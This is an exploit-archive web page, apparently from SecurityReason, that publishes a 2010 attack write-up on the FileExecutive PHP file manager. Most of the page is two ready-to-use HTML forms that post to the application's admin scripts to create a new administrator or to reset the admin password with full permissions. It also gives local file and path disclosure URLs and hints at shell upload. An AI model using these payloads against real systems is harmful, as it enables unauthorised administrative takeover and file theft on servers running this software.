SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

FileExecutive Multiple Vulnerabilities


Arrow  ExploitAlert : 7857
Arrow  Credit : ViRuSMaN
Arrow  Date : 01.03.2010

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

===========================================================================
===
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist
,Golden-z3r0 ,Shr7 Team . ]
===========================================================================
===
[»] FileExecutive Multiple Vulnerabilities
===========================================================================
===

[»] Script: [ FileExecutive v1.0.0 ]
[»] Language: [ PHP ]
[»] Site page: [ FileExecutive is a web-based file
manager written in PHP. ]
[»] Download: [
http://sourceforge.net/projects/fileexecutive/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com -
totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All
My Friends & Islam-Defenders.Org ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################


===[ Exploits ]===

[»] http://im2up.com/r0x/1.txt ->The Exploit Code
<-=- Remote Add Admin Exploit
[»] http://im2up.com/r0x/1.txt ->The Exploit Code
<-=- Remote Edit Admin Exploit
[»] By Go To The End Of Page & Browse Your Shell 2 upload it
<-=- Remote File Upload Vulnerability
[»] http://localhost/[path]/download.php?file=./LFD
<-=- Local File Disclosure Vulnerability
[»] http://localhost/[path]/listdir.php?dir=./FPD
<-=- Full Path Disclosure Vulnerability

Author: ViRuSMaN <-

###########################################################################


# 1 # Remote Add Admin Exploit #
<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php'
method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32'
onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0'
selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms'
value='1'></td><td>No:<input type='radio' name='grp_perms' value='0'
id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin'
value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc"
checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create
File</td> <td><input type='checkbox' name='mkdir' value='1'>Create
Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input
type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input
type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input
type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move'
value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User'
name='sub'> <input type='button' value='Cancel'
onclick='top.location="index.php"'></td>
</form>
</body>
</html>

# 2 # Remote Edit Admin Exploit #
<html>
<head>
<title>FileExecutive Remote Change Admin Password Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/do_edit_user.php'
method='POST' onSubmit='return chk(this)'><input type='hidden' name='uid'
value='1'>
<td>UserID:</td><td>1</td>
<td>Username:</td><input type='text' name='username' value='admin'
maxlength='32' onkeyup="showHint(this.value)">
<td>Password:</td><input type='text' name='password' value=''>
<td>Name:</td><input type='text' name='name' value='admin' maxlength='32'>
<td>Root Directory:</td><input type='text' name='root' value='../../'
maxlength='200'>
<td>Max Upload Size:</td><input type='text' name='uload_maxsize'
value='100000' size='8'>
<select name='multiplier'>
<option value='1'>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0'
selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms'
value='1'></td><td>No:<input type='radio' name='grp_perms' value='0'
id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'
checked></td><td>No:<input type='radio' name='admin' value='0' id="abc">
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1' checked>Create
File</td> <td><input type='checkbox' name='mkdir' value='1' checked>Create
Folder</td></tr>

<td><input type='checkbox' name='uload' value='1'
checked>Upload</td> <td><input type='checkbox' name='rename' value='1'
checked>Rename</td></tr>
<td><input type='checkbox' name='delete' value='1'
checked>Delete</td> <td><input type='checkbox' name='edit' value='1'
checked>Edit</td></tr>
<td><input type='checkbox' name='dload' value='1'
checked>Download</td> <td><input type='checkbox' name='chmod' value='1'
checked>Chmod</td></tr>
<td><input type='checkbox' name='move' value='1'
checked>Move</td> <td> </td></tr>
<input type='submit' value='Edit User' name='sub'> <input
type='button' value='Cancel' onclick='top.location="index.php"'>
</form>
</body>
</html>




Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.